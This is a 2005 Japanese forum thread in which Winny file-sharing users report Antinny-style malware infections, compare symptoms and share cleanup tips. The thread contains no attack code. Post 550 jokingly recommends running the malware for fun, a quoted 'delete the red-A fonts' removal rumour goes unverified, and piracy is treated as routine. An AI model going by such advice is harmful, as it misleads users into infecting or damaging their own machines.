531:[名無し]さん(bin+cue).rar
05/02/16 00:42:17 YcGtu7I30
>>526
ありがとうございます
マイドキュメントにありました
532:[名無し]さん(bin+cue).rar
05/02/16 01:03:23 MUkT2LHD0
このスレでさ
Winnyをよく使用しててそれでも一年ぐらいウイルスに
かかってない猛者っていないよな?
533:[名無し]さん(bin+cue).rar
05/02/16 01:06:21 l2S21LjF0
2年ほど使っているが俺は一度も感染していない。
まあ、このスレをよく見ているのおかげだが。
534:[名無し]さん(bin+cue).rar
05/02/16 01:10:52 x8e+VWk+0
>>529
遅効性だったらどうするんだ。
535:[名無し]さん(bin+cue).rar
05/02/16 01:12:43 FCU/634p0
>>507の踏んだあとウイルス検索したけど何もでないことってありますか?
536:[名無し]さん(bin+cue).rar
05/02/16 01:16:37 0Pev5+JK0
>>535
どう思いますか?
537:[名無し]さん(bin+cue).rar
05/02/16 01:17:46 KMF/Fpbn0
うちの場合は~のデスクトップ.bmpはデスクトップにできてたなあ。
あとAdobe Gamma Loaderだけど、うちはスタートアップには何もできてなかった。
検索すると、"Adobe Gamma Loader.lnkCommon Startup"ってファイルが見つかったけど
これは多分うちの場合は以前から、msconfigで
スタートアップからAdobe Gamma Loaderを消してたので、それの退避ファイル?なのかな。
そこらへんから見ると多分Adobe Gamma Loaderはシロっぽいけど。
送信パケットとか見る分には今のとこは特に悪さはしてない風だけど、
遅効性ってことはあるのはあるのかもねー、あーこわ。
538:[名無し]さん(bin+cue).rar
05/02/16 01:18:03 ABE/vpxo0
>>532
猛者って・・・感染しない奴の方が多いんじゃねーか?
539:498
05/02/16 01:27:36 T5lKoGkm0
>>530
違うウィルスなのかなぁ
>>507には「326144バイトのほぼ同名EXEアイコンをダブクリ
デスクトップが「晒されてもいいじゃないか 泥棒だもの ぬるぽ」というbmpに変更された」
ってなってるけど、私の場合ほぼ同名のzipファイルを解凍したら「偽装解除.bat」と
10個くらいの不明ファイルが出てきて、この「偽装解除.bat」を実行したら画面の真ん中に
「♂♀」だけ出て、あとはあえぎ声だったんです
「まだ懲りないの?.bmp」も「adobe gamma loader」も見つからないし...
540:[名無し]さん(bin+cue).rar
05/02/16 01:33:12 E2b3+tBw0
>>534
その時はその時でなんとかする。
541:[名無し]さん(bin+cue).rar
05/02/16 01:43:27 hi46Oqqx0
>>536
検索する前にexeとかを削除したんですが、
その後ウイルス検索しても何もでないけど
bmpとかは残ってるので消えてないのかなと思いました。
IDかわってるかもだけど私>>535です。
542:[名無し]さん(bin+cue).rar
05/02/16 02:05:18 UqvjmDUi0
Adobe Gamma Loader.exe
URLリンク(www.google.com)
見る限りでは何でもないファイル、もう手っ取り早くぁゃιぃプロセスと親ファイル晒せ
URLリンク(www.geocities.jp)
543:[名無し]さん(bin+cue).rar
05/02/16 02:43:19 /cUh2MQW0
ny使いかどうかは別にして、感染なんかするほうがどうかしてるぞ
544:[名無し]さん(bin+cue).rar
05/02/16 02:47:33 cNq7VYDw0
バカばっか
545:[名無し]さん(bin+cue).rar
05/02/16 02:55:48 hSSYpnE60
私も以前は引っかかる香具師は馬鹿中の馬鹿
そう思っていたのに…
昨日は天誅殺か大殺界?みたいなもんですかねw
546:[名無し]さん(bin+cue).rar
05/02/16 03:23:14 XFgx84Yk0
>>545
,j;;;;;j,. ---一、 ` ―--‐、_ l;;;;;;
{;;;;;;ゝ T辷iフ i f'辷jァ !i;;;;; ウイルスに感染する香具師は馬鹿中の馬鹿
ヾ;;;ハ ノ .::!lリ;;r゙
`Z;i 〈.,_..,. ノ;;;;;;;;> そんなふうに考えていた時期が
,;ぇハ、 、_,.ー-、_',. ,f゙: Y;;f. 俺にもありました
~''戈ヽ `二´ r'´:::. `!
547:[名無し]さん(bin+cue).rar
05/02/16 03:25:10 7kkNXfcC0
それ、流行るな
548:409
05/02/16 04:07:23 D/u62stz0
>>409です・・・
OS再インスコするとは言ったものの、時間が無くてバックアップしかしてません。
ログ読んでみるとSS保存、壁紙変更以外に活動してる様子は無いみたいですね。
SSの保存場所は多少違いがあるみたいですけど、同じexeですよね?
(俺の場合、フォルダ名をマイドキュメントから変更していたためかデスクトップに保存されてた)
実害もないことだし、取り敢えず様子見ます。
ていうか、踏んだ人意外と多いのね・・・
>>546
俺にもありました
549:[名無し]さん(bin+cue).rar
05/02/16 04:11:41 MUkT2LHD0
みなさん
今までWinnyで落としたデータやコンテンツ
を金額で換算するとどれぐらいになる?
俺は10万いったくさい
550:409
05/02/16 04:16:44 D/u62stz0
ny歴2年。
こないだまで鉄壁君だったけど、UperOOniseのファイルで
うっかりexe踏んだ。一度やってみなよ。
初回のみだけど、デスクトップのSSを撮って貰える。
ビビるだけビビって削除せずに放置することもできるし、思い切って
.exeで検索かけてしまえばわりと何も出ない。
不安ならOSクリーンインストールすればいいだけ。暇つぶしになる。
遅効性だったときのスリルとか色々あるのでマジでお勧め。
551:507
05/02/16 05:16:56 lDpPZbwW0
俺は「お気に入り」にある「Tips-Winny」フォルダに新規のUpFolder.txtがあり
そこ自身だけを指定してありました。
おそらくWinnyと名前の付いたフォルダを見つけると目クラで上書きするので
運が悪い場合のみUpFolder.txtを上書きされてしまうんだと思います。
(別のドライブにWinny2フォルダがあったけど無事)
なんとなく稚拙な新種でそう高度な事はされてない気がします。
踏んでおいてナンですがw
552:[名無し]さん(bin+cue).rar
05/02/16 06:19:56 11Ht2S4t0
Lが死んだとか聞いてあせって開こうとして踏んでしまったよ
553:[名無し]さん(bin+cue).rar
05/02/16 06:59:12 FqPnyqgM0
二つファイル落としてデスノートの「二択」と「胸中」だったんだけど
ウィルスバスター反応しないし、「二択」読んだ後だったから
安心と早く次読みたいっていうのでダブクリしちゃったんだよね。
フォルダ開いたら.Tumbがあっておかしいと思ったがその時にはもうクリックしちゃってた。
554:[名無し]さん(bin+cue).rar
05/02/16 08:09:40 0Pev5+JK0
>>552-553
だからなんだと言うんだ
555:[名無し]さん(bin+cue).rar
05/02/16 08:34:22 A4Is3sXe0
>>498
って既出のウイルス?
とりあえずC\windows\system32 の中にコピーされたと思う本体を消したらギシアンは消えたけど、アプリは起動できず。
対処法が合ったらお願いしたいのですが。
ちなみにnyで拾った友人に渡された被害者です。 _| ̄|○
556:[名無し]さん(bin+cue).rar
05/02/16 08:38:24 u99klNFJ0
だからここは質問・救済スレじゃない、と何度言ったらわかるんだー
557:[名無し]さん(bin+cue).rar
05/02/16 08:42:54 A4Is3sXe0
すまん。
どこで聞けばよいの? ウイルス関係乱立してわかんないよ(つД`)
558:[名無し]さん(bin+cue).rar
05/02/16 09:55:27 x8e+VWk+0
そのような便利なスレはございません。
セキュ板いってもAntinnyなんて相手にされんだろ。
筋から言えばその友人になんとかしてもらえ。
559:[名無し]さん(bin+cue).rar
05/02/16 10:06:04 DHKBfESF0
まあテンプレ読んで対処できないなら初期化&新規インスコだ。
自分で拾おうが友達から渡されようが、自分のマシンで自分が実行
したなら自業自得ってことだし。
560:[名無し]さん(bin+cue).rar
05/02/16 10:11:38 11Ht2S4t0
救済スレじゃなかったんだ。今知った
561:498
05/02/16 10:40:36 T5lKoGkm0
>>555
system32にあった「taskmen.exe」ってのがそうなんですかね
「作成日時:2005年2月15日13:07:44」ってなってるし
とりあえず削除してみたところ、同じようにギシアンは消えましたが
アプリケーションを起動しようとすると「ファイルを開くプログラムを選択してください」
が出てきます
\(||_ _)/ オテアゲ
562:[名無し]さん(bin+cue).rar
05/02/16 10:53:13 UR3Ruuo40
スレ進んでると思ったら・・・、何ですかこの狂態は
563:[名無し]さん(bin+cue).rar
05/02/16 11:09:08 99ye/hfF0
Whiterみたいにもっと致命的なウイルスだったら、書き込みすら
できなくて静かなんだろうがな。
564:[名無し]さん(bin+cue).rar
05/02/16 11:13:15 MISjc2zq0
>>560
だってウィルスにかからないように注意してる人たちが集まるスレだもん。
565:498
05/02/16 11:16:16 T5lKoGkm0
なまじ動くもんだから、何とかなるんじゃないかとじたばたしてます
ちなみに書き込みはサブノートから
566:498
05/02/16 11:24:43 T5lKoGkm0
taskmen.exeを削除する前
[通常起動」→windows画普通に起動し(壁紙も普通)常駐アプリが起動するときに発症
「セーフモード」→アプリケーションを起動すると発症(エクスプローラー、ノートパッドなどは発症せず)
taskmen.exeを削除したあと
アプリケーションを起動すると「ファイルを開くプログラムを選択してください」が出る
ていう感じなので、exeを実行する部分の何かが書きかえられちゃったのかな?
そのうち誰かが解析してくれるのをのんびり待つことにします
567:[名無し]さん(bin+cue).rar
05/02/16 11:41:08 fuFhnYJH0
>>566
ウイルスが何をするのかは解析されるだろうけど、復旧手順は期待
するなよ。解析の過程で副産物として出てくることはあるけどね。
関連付けがおかしくなったせいだろうから、そのへんをチェック。
568:498
05/02/16 11:59:26 T5lKoGkm0
>>567
「ファイルとexeの関連付け」はいくつかチェックしてみたけれど
特に問題なさそうでした(サブノートと比較した)
エクスプローラーは使えるので、必要なファイルとかは外付けHDDに
移せばまぁ再インストールでもしょうがないかなぁと思ってます
外付けHDDが容量厳しくなってるのでまず整理しなきゃならないので
いずれにせよしばらくはサブノートでのんびり行きます
exeが使えればDVD-Rに焼けるのになぁ
569:[名無し]さん(bin+cue).rar
05/02/16 12:26:23 B76HR7js0
フォルダ偽装は忘れたころに踏んじゃう(*´Д`)
570:[名無し]さん(bin+cue).rar
05/02/16 13:30:52 Sv98ZUp50
ありえねぇ。
つーかフォルダアイコンくらいデフォルトから必ず変更しとけって話。
ついでに言えばエクスプローラも下線付きのシングルクリック設定にしとけば
ぬるぽ.avi .exe
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
という表示になるから拡張子偽装も一目で解るし絶対踏むこともない。
テンプレには
>・うっかり操作防止のため、エクスプローラの操作はダブルクリック。
などと書いてあるがむしろ逆効果だろ。
571:[名無し]さん(bin+cue).rar
05/02/16 13:32:01 Sv98ZUp50
ありえねぇ。
つーかフォルダアイコンくらいデフォルトから必ず変更しとけって話。
ついでに言えばエクスプローラも下線付きのシングルクリック設定にしとけば
ぬるぽ.avi .exe
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
という表示になるから拡張子偽装も一目で解るし絶対踏むこともない。
テンプレには
>・うっかり操作防止のため、エクスプローラの操作はダブルクリック。
などと書いてあるがむしろ逆効果だろ。
572:[名無し]さん(bin+cue).rar
05/02/16 13:33:41 oDxgolZA0
だからフォルダ表示を変更しておけって。
うちは2000だから、もともと無問題だが。
573:[名無し]さん(bin+cue).rar
05/02/16 13:31:54 Sv98ZUp50
ありえねぇ。
つーかフォルダアイコンくらいデフォルトから必ず変更しとけって話。
ついでに言えばエクスプローラも下線付きのシングルクリック設定にしとけば
ぬるぽ.avi .exe
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
という表示になるから拡張子偽装も一目で解るし絶対踏むこともない。
テンプレには
>・うっかり操作防止のため、エクスプローラの操作はダブルクリック。
などと書いてあるがむしろ逆効果だろ。
574:[名無し]さん(bin+cue).rar
05/02/16 13:41:10 dgi/UPzf0
すっかり498の日記帳になったな
575:[名無し]さん(bin+cue).rar
05/02/16 13:42:42 dgi/UPzf0
ここは498の日記帳になったようだな
576:555
05/02/16 13:44:50 A4Is3sXe0
498タン見てる?
いろいろやってみたけど、タスクのスケジュールでスケジュールから起動するとアプリも起動できるみたい。
で、窓の社とか立ち上げたけど自動起動に変なものはなかったからレジストリかと。
でも他にどんな害があるのかは知らぬ。
577:555
05/02/16 13:45:24 A4Is3sXe0
498タン見てる?
いろいろやってみたけど、タスクのスケジュールでスケジュールから起動するとアプリも起動できるみたい。
で、窓の社とか立ち上げたけど自動起動に変なものはなかったからレジストリかと。
でも他にどんな害があるのかは知らぬ。
578:[名無し]さん(bin+cue).rar
05/02/16 13:46:57 A4Is3sXe0
498タン見てる?
いろいろやってみたけど、タスクのスケジュールでスケジュールから起動するとアプリも起動できるみたい。
で、窓の社とか立ち上げたけど自動起動に変なものはなかったからレジストリかと。
でも他にどんな害があるのかは知らぬ。
579:555
05/02/16 13:48:06 A4Is3sXe0
多重カキコスマン
580:[名無し]さん(bin+cue).rar
05/02/16 13:54:48 d4WhvpXs0
一時ダウソ板がおかしかったからな
581:[名無し]さん(bin+cue).rar
05/02/16 13:57:15 cwJo8nW70
赤いめがねのCGのウイルスかかったのですが
どうしたらいいですか?やっぱりOSインスコですか?
他に何かあるの?
582:[名無し]さん(bin+cue).rar
05/02/16 14:01:02 /SfQnaHt0
解決するまで498にのんびりできる日々はこない
583:498
05/02/16 14:01:20 T5lKoGkm0
>>576
みてるみてる
アプリが使えるようなら、DVD-Rに退避して再インストールの方向で検討します
ワームみたいにほかのファイルに転移するのか不明なのでそれを確認してからかな?
何となくほかのファイルは無事な気がするけど
584:555
05/02/16 14:12:43 A4Is3sXe0
今見たらexeに関するレジストリは無事だったんだよね。
HKEY_CLASSES_ROOT -> .exe
の部分だけど。
最インスコした方が早いかなぁ?
585:[名無し]さん(bin+cue).rar
05/02/16 14:14:31 A8cLyt/t0
平穏だったのに
ウイルス踏んだ厨が居座って盛り上がってますねw
解析する力も気もないなら
ケーブル切って素直に再インストールしとけ。
586:[名無し]さん(bin+cue).rar
05/02/16 14:23:15 11Ht2S4t0
エラソ・・・
587:[名無し]さん(bin+cue).rar
05/02/16 14:29:40 8u5kWtwR0
普通の反応と思うけど
588:[名無し]さん(bin+cue).rar
05/02/16 14:31:25 oDxgolZA0
>>1の1行目も読まずに厚顔無恥な質問してくるほうが、えらそうと
いうか傍若無人というか。
589:[名無し]さん(bin+cue).rar
05/02/16 14:33:05 cNq7VYDw0
エラソもなにもココはそーいったスレじゃね?
>>1の1行目すら読まないヴォケはニュイルス踏んで滅んでしまへ
590:[名無し]さん(bin+cue).rar
05/02/16 14:45:13 T5lKoGkm0
>>588>>589
あ~ごめん
ぜんぜん読んでませんでした
もう出てきませんので許してください
591:[名無し]さん(bin+cue).rar
05/02/16 14:52:52 EacPUhRQ0
雑誌の立ち読みしただけなので記憶があやふやだけど
拡張子ごとに色を変える方法があったような…
exeやcomが赤く表示できれば引っかからないんだが
592:[名無し]さん(bin+cue).rar
05/02/16 15:09:06 jcwssrC/0
>591
詳細表示で「ファイルの種類」も表示させればいいじゃん。
593:[名無し]さん(bin+cue).rar
05/02/16 15:14:30 A8cLyt/t0
>>591
>>5
>・アイコン偽装したexeを見分けるため、
> フォルダ・txt・aviなど偽装されやすい拡張子は標準アイコンから変更しておく。
なヨカーン。
違うとしても少なくともこの方法でアイコンを標準と明らかに違うのを使えば誤って踏むことはない。
594:[名無し]さん(bin+cue).rar
05/02/16 15:25:50 ZboJx+CZ0
Winnyウイルスをなぜ踏むのかランキング
1、抜ける画像、エロゲーの前に興奮してついつい即解凍、即クリック
2、ほしかった画像、ゲーム、データの前に興奮してついつい即解凍、即クリック
3、チェックしてもひっかからなかった。
最近はウイルスチェックをいちいちめんどくさがる人もいます、でもよく考え
てください。チェックにかける時間と、かかったあとに駆除処理をする時間を・・
比べてください。
あと落としたデータの属性と中身を考えましょう。
コミック、同人誌、などの書物のデータなら
解凍したあと、フォルダの中身にJPEG イメージなどがあるはずです、
それもページ数相応に、あきらかにフォルダの中に、よくわからんフォルダ
があったり、bmpファイルがあったり(漫画類でbmpはほとんどありえない)、
JPEGが数個しかなかったり、あきらかに怪しいので、注意しましょう。
解凍ソフトは中身がみれるRARなどがお勧めです、ただ解凍前にチェック
するのも忘れずに。
595:[名無し]さん(bin+cue).rar
05/02/16 16:01:05 om6x2Fgw0
たしか>>507みたいな奴で中のフォルダをダブルクリックしたけど
何も起こらなかった その後スキャンしても関係ないトロヤンがあっただけ
596:[名無し]さん(bin+cue).rar
05/02/16 17:07:24 1RSiFY+c0
面白いウィルスがあると聞いて飛んできました
初心者の頃このスレにお世話になったなぁ
今となってはおそらく当分お世話になることはないだろうけど
597:[名無し]さん(bin+cue).rar
05/02/16 18:02:46 U+44562u0
ファイラー使ってないやつ、多いんだな・・・。
598:[名無し]さん(bin+cue).rar
05/02/16 18:19:45 gB55GAf20
>>590
もうみてないかもしらんが
www.symantec.com/region/jp/sarcj/data/t/tool.to.reset.shellopencommand.registry.keys.html
を入れたらなおったっぽい
たぶん
599:555
05/02/16 18:44:33 A4Is3sXe0
>>598
神! 神! 神!
つまりこのウイルスの駆除方法は
セーフモードで C\windows/system32 の中の taskmen.exe を削除後に>>598 をインスコでとりあえず通常の状態には戻るのかな?
他にどんな効果があるのかわからないのが怖いが。
600:[名無し]さん(bin+cue).rar
05/02/16 18:46:02 A4Is3sXe0
あ、でもまだスタートからシャットダウンがないのとCtrl + ALT + Del からシャットダウンが選択できないなぁ。
601:[名無し]さん(bin+cue).rar
05/02/16 18:46:11 1RSiFY+c0
待っていればそのうちノートン先生がちゃんとしたパッチ出してくれると思うけどね
602:[名無し]さん(bin+cue).rar
05/02/16 18:50:45 nFrqc8/G0
【使用OS】ME
【WindowsUpdateしてるか】している
【使用AntiVirusソフト】ウイルスバスター2004
【AntiVirusをUpdateしてるか】している
【ウイルススキャンの結果】
17件ヒット
種類 ウイルス名 感染元 ウイルス検出時の処理 ウイルス駆除
ファイル WORM_ANTINNY.A A0900358.CPY (C:\_RESTORE\ARCHIVE\FS179.CAB) 隔離できません
ファイル --- C:\_RESTORE\ARCHIVE\FS20.CAB ウイルス駆除できませN 隔離できません
ファイル PE_Parite.A A0884060.CPY (C\_RESTORE\ARCHIVE\FS20.CAB ウイルス駆除できませN 隔離できません
【オンラインスキャンしたなら結果】
【Winnyのバージョン】1.14
【Winny歴、総DL量】半年。5GBぐらい。
【テンプレを読んだか】呼んでない。
【テンプレにある対策を実行したか】してない。
【症状、具体的に分かる限りすべて書く】ウイルス検索にひっかかる。なんか怖い。
【何をしたらそんなことになったのか】600KBぐらいのEXEファイルを落としていた。9KBぐらいのメガねのおっさんの画像を落としていた。
【これまでにとった措置】ウイルスバスターのサイトに逝って、ANTINNY駆除対策の実行を試みた。
レジストリエディタでRUNの値を見たが怪しいのが無かった。わかんなくなった。助言をしてください。
603:[名無し]さん(bin+cue).rar
05/02/16 18:51:58 1RSiFY+c0
>>602
隔離したなら問題ない
604:[名無し]さん(bin+cue).rar
05/02/16 18:53:03 1RSiFY+c0
あー隔離できなかったのね
じゃあ自分で隔離したら?
605:[名無し]さん(bin+cue).rar
05/02/16 18:54:33 bQHwbkjv0
\_RESTORE\ARCHIVE
でググれ、これテンプレ入れた方が良いんじゃないか?
606:[名無し]さん(bin+cue).rar
05/02/16 18:54:47 YB+Js9Hb0
またC:\_RESTOREかよ。
ぐぐったら対策が山ほどでてくるから、それ読んでこい。
つか中途半端にテンプレ埋める前に、>>1の1行目も熟読しろ。
607:602
05/02/16 18:57:36 nFrqc8/G0
>>603-606
すんまそん。ググッテ調べてみます。
608:[名無し]さん(bin+cue).rar
05/02/16 21:13:38 ZboJx+CZ0
/|:: ┌───┐ ::|
/. |:: | | ::|
|.... |:: | Antinny.j .| ::|
|.... |:: | | ::|
| |:: | | :: |
|.... |:: └───┘ ::|
\_| ┌──┐ .| ∧∧
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ( _)
/ ̄ ̄ ̄ ̄ ̄旦 ̄(_, )
/ \ `
| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|、_)
 ̄| ̄| ̄ ̄ ̄ ̄ ̄ ̄| ̄| ̄
| .( ( | |\
| ) ) ) | | .|
|________(__| .\|
/― ∧ ∧ ―-\≒
/ ( ) \
| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ |
|______________|
∧∧
( ・ω・)
_| ⊃/(___
/ └-(____/
 ̄ ̄ ̄ ̄ ̄ ̄ ̄
<⌒/ヽ-、___ <シクシク
/<_/____/
609:[名無し]さん(bin+cue).rar
05/02/16 21:25:50 T5lKoGkm0
>>3
『まず、ここは初心者の質問・救済スレではありません。』なので、
次回から「質問テンプレ」ではなく「報告テンプレ」にしてはいかがでしょうか?
610:[名無し]さん(bin+cue).rar
05/02/16 21:29:45 AEH+3d3T0
つーかさ、なんでこのスレの人はこんな不親切なわけ?
リア厨と謗られようと構わない。もっと親切に教えろ!と俺は言いたい。
しっかり対策されたパソコン使ってるような人はこれでも良いんだろうけど。
てかさ、あんたらだって昔は俺みたいにわかんない事だらけだったんだろ?
みんな最初は初心者なんだからさ、親切に教えるべきだと思うよ。
ルータのポート設定も。動画の再生方法も。ウイルスだってそうだ。
テンプレももっとわかりやすくしてくれよ。正直なに書いてあるのかさっぱりだし。
すぐにとは言わないけど、次スレまでには何とかして欲しい。
とりあえず俺が言いたいのはそれだけだ。
611:[名無し]さん(bin+cue).rar
05/02/16 21:32:18 SvoWFs6H0
リア厨乙
612:[名無し]さん(bin+cue).rar
05/02/16 21:33:58 BtJWjdz80
>ルータのポート設定も。動画の再生方法も。ウイルスだってそうだ。
全部ググって勉強した
613:[名無し]さん(bin+cue).rar
05/02/16 21:35:00 YB+Js9Hb0
もっと学んで答えられるようになってから、またおいで。
614:[名無し]さん(bin+cue).rar
05/02/16 21:41:39 /i6kkWze0
俺は教えられたら教えるけど、馬鹿だぞ?
615:[名無し]さん(bin+cue).rar
05/02/16 21:48:37 bQHwbkjv0
つーか縦読みしろっていうのは無粋かな
616:[名無し]さん(bin+cue).rar
05/02/16 21:49:51 bQHwbkjv0
書き忘れた、良くできてる
617:[名無し]さん(bin+cue).rar
05/02/16 22:15:04 5vqDJeRq0
>>611-614はうっかりexe踏むタイプだな
間違いない
618:[名無し]さん(bin+cue).rar
05/02/16 22:22:32 /i6kkWze0
>>617
そんな事はない。
うっかり踏んでしまうなんて…そんな馬鹿じゃないよ。
だが、一瞬の判断の間違いってもんがあるだろ
なんでも確認してやれないだろ。
619:[名無し]さん(bin+cue).rar
05/02/16 22:50:23 K4758CMS0
44 名前: [名無し]さん(bin+cue).rar [sage] 投稿日: 05/02/16 21:40:18 ID:BWrclx0W0
Winny悪性の新ウィルス出現
~確認と削除方法~
①スタートメニューからコントロールパネルを選択
②フォントフォルダを開く
③赤い地でAと書いたファイルが有ればウィルスです。
④全て削除して下さい。(数回警告が出ますが、OKを選択)
⑤再起動
これ本当?
620:[名無し]さん(bin+cue).rar
05/02/16 23:03:16 ogrC3kED0
>>619
お前はnyやる前にWindowsを勉強しろ
621:ぬるぽ詰め合わせ.zip.exe
05/02/16 23:10:38 5vqDJeRq0
>>618
一瞬の判断ミスとか、油断とかはうっかりに含まれね?
俺的には、普段注意してる奴がexe踏んだらすべてうっかりだ
そしてそれは俺のことだ
>>619
うわぁ、何かこわいですね!(^_^;)
・・・で、それはどんなウィルスなんだ?
622:[名無し]さん(bin+cue).rar
05/02/16 23:38:16 x8e+VWk+0
>>610
不親切というか、ここ質問スレじゃないし。
623:[名無し]さん(bin+cue).rar
05/02/16 23:40:02 BWc9/FXx0
409と同じウイルスにかかった人、Documents and Setting のフォルダ(もしくはその中のフォルダ)を開くと、
「Microsoft .NET Passportにサインイン」というウインドウが出ませんか?これはウイルスのせいでしょうか?
それともこれはウイルスにかかっていなくても出るものなのでしょうか?
同じ症状の人いませんか?
624:[名無し]さん(bin+cue).rar
05/02/17 00:18:28 BFPKKsqg0
>>622
つくづくここの人は親切じゃないね。
理解ってものを少しは示してくれてもいいんじゃないの?
できるんなら俺だって自分で何とかしたいよ。できないから頼ってるんだよ。
スレが違うとかじゃなくてさ
ネットに繋いでる者同士仲良くするべきなんじゃないの?
あんたも人間ならさ、困ってる人見つけたら
なんとかしてあげようって気にはならないの?
たすけてくれよ!まじで!
625:[名無し]さん(bin+cue).rar
05/02/17 00:28:04 bIMJr/3FO
困ってる人みるとニヤニヤしたくなるよ
みんなもそうだろ?
626:[名無し]さん(bin+cue).rar
05/02/17 00:28:35 NSXQXuIW0
マジレスすると、まず、ググった?
面倒な人は再インスコ。
627:[名無し]さん(bin+cue).rar
05/02/17 00:32:49 cp/5t5XF0
おいおい
直前のレスぐらい読めって
628:[名無し]さん(bin+cue).rar
05/02/17 00:38:26 /KObySx90
>>624
俺も猫大好き
629:[名無し]さん(bin+cue).rar
05/02/17 00:39:12 GSORNqpl0
>>624
助けてくれよと言う人間にホイホイ手を差し伸べていっても
その人のためにならない。人を頼ることが癖になる。
調べれば出てくるのに調べないそいつが悪い。
自己責任でするべき事に他人を関わらせるって事がどうかしてる。
>>610では
みんな最初は初心者だったのだから教えてやれ
とほざいているが
自分は今の知識を全て自分で調べた。
理解できないことは
根気強くネット上に這いつくばって調べたり本買って読むなどすれば
その内理解できる
つーことで
自分で調べれば解決できる
解決できないからって直ぐに人を頼らない
これ鉄則
出来ないならny辞めろ
630:[名無し]さん(bin+cue).rar
05/02/17 00:40:45 GSORNqpl0
あぁ縦読みにマジレスしてる自分が恥ずかしい(´Д`*)
631:[名無し]さん(bin+cue).rar
05/02/17 00:41:49 BFPKKsqg0
もっと親切にしてくれっていってんだろ?
うだうだ言ってないでさ
むずかしいことはできないかから
りかいできる言葉でしゃべってくれる?
ぽは無理だろ。思いつかないよ。
632:[名無し]さん(bin+cue).rar
05/02/17 00:44:30 GSORNqpl0
>ぽは無理だろ。思いつかないよ
ワロタ
633:[名無し]さん(bin+cue).rar
05/02/17 00:44:46 bIMJr/3FO
携帯からだと盾詠みになってないよぅ
634:[名無し]さん(bin+cue).rar
05/02/17 00:46:34 hqWZ+K8t0
>>630
つまづいたって いいじゃないか 人間だもの みつを
635:[名無し]さん(bin+cue).rar
05/02/17 01:23:41 iLRdDFTZ0
>>498
俺も同じの踏んだ
exeは起動できるようになったけど、シャットダウンできないから
今月始めにとったバックアップで復旧してみます
636:[名無し]さん(bin+cue).rar
05/02/17 01:24:47 RjsamEOa0
>>631
Antinny救済質問スレでも立てたらどうよ。
きっと親切な人がよってたかって答えてくれるよ。
637:[名無し]さん(bin+cue).rar
05/02/17 01:32:43 fxPZuFa00
>>636
空気嫁
でも、もう質問とゆーか、感染者同士の報告・対処情報交換スレと
解析調査・技術検討スレは別に立てないとあかんと思うよ
もうこのスレだめぽ
638:[名無し]さん(bin+cue).rar
05/02/17 01:36:25 Au/VT9Ej0
久しぶりに来たが
ギシギシアンアンでexe関連付けというのはかなり前に流行って収束してたような?
誰かがちょっと変更してしこんだのか?
でも対処は以前と全く同じにみえる
639:[名無し]さん(bin+cue).rar
05/02/17 01:45:24 iLRdDFTZ0
>>638
詳しく
640:[名無し]さん(bin+cue).rar
05/02/17 01:52:11 6M728Uwg0
ブーブ-教えろって言ってるやつ。
理解できるまで俺が最後まで付き合ってやるから、
俺に頭下げてみろ。
641:[名無し]さん(bin+cue).rar
05/02/17 02:22:41 2wOW0GuP0
おまいら
ここは質問スレでも釣り堀でもねーぞ
敢えて呼ぶなら水族館だw
642:[名無し]さん(bin+cue).rar
05/02/17 03:15:41 CzcyHTEY0
>498
これで。
URLリンク(www.symantec.com)
643:[名無し]さん(bin+cue).rar
05/02/17 03:18:01 fxPZuFa00
既出なのでageてもウザいだけ
644:[名無し]さん(bin+cue).rar
05/02/17 03:58:09 69263+OL0
Antinny.Gってどう?
結構、芸術的な気がしない?
645:[名無し]さん(bin+cue).rar
05/02/17 04:31:35 5jYumHa00
質問だめなら質問を荒らしとみなして無視して雑談すればいいじゃん^^
禁止しても代わりのスレがないなら結局ここに来る^^
代わりになるスレでも立てよう^^
文句言ってないで少しは自分で何とかしたら^^?
646:[名無し]さん(bin+cue).rar
05/02/17 04:34:31 6M6utTBz0
質
禁
代
文
647:[名無し]さん(bin+cue).rar
05/02/17 04:59:34 9a3GHuBe0
£←キモイ
648:[名無し]さん(bin+cue).rar
05/02/17 07:16:18 fvMPnGqW0
>>624
PC関係の板じゃ、親切な方がよっぽど珍しい。 ^^;
なぜなら、質問してくる人に長文でマジレスつけても、
「サンクス」の一言も書かない輩に当たったことがあるから。
649:[名無し]さん(bin+cue).rar
05/02/17 07:37:18 V+YsJQLu0
>>648
断て読みレスに回答してたから、返事こなかったんじゃね~の?
650:[名無し]さん(bin+cue).rar
05/02/17 07:41:24 fxPZuFa00
情報スレとか関係なく教えろだの釣りだの雑談だので
埋まってしまうあたりがダウソ板らしいところだ
651:[名無し]さん(bin+cue).rar
05/02/17 07:43:45 fvMPnGqW0
>>644
SSを晒す金玉は本当に芸術的な作品でしたな。
あの祭りは楽しかった
652:[名無し]さん(bin+cue).rar
05/02/17 08:01:14 vpFLciKv0
xpの起動回数が18回前後で、デスクトップやシステム設定が初期化されるんだけど、これって、ウィルスのせい?
653:[名無し]さん(bin+cue).rar
05/02/17 08:20:16 6M6utTBz0
>>652
>>1
『まず、ここは初心者の質問・救済スレではありません。』
654:[名無し]さん(bin+cue).rar
05/02/17 08:31:25 iheRM8cE0
新種のキンタマウィルスまだー
655:[名無し]さん(bin+cue).rar
05/02/17 08:34:22 QGozIDvB0
xpの起動回数が18回前後で普通にダウン板に書き込みですか。
なかなかやるなあ。
スレ読んでて思ったが、ny使用中にブラウザが重くなるんで
なかなか読み込みされなくて待ちきれず、
思わず多重カキコしちまった時期があったよ。ぬるぽ
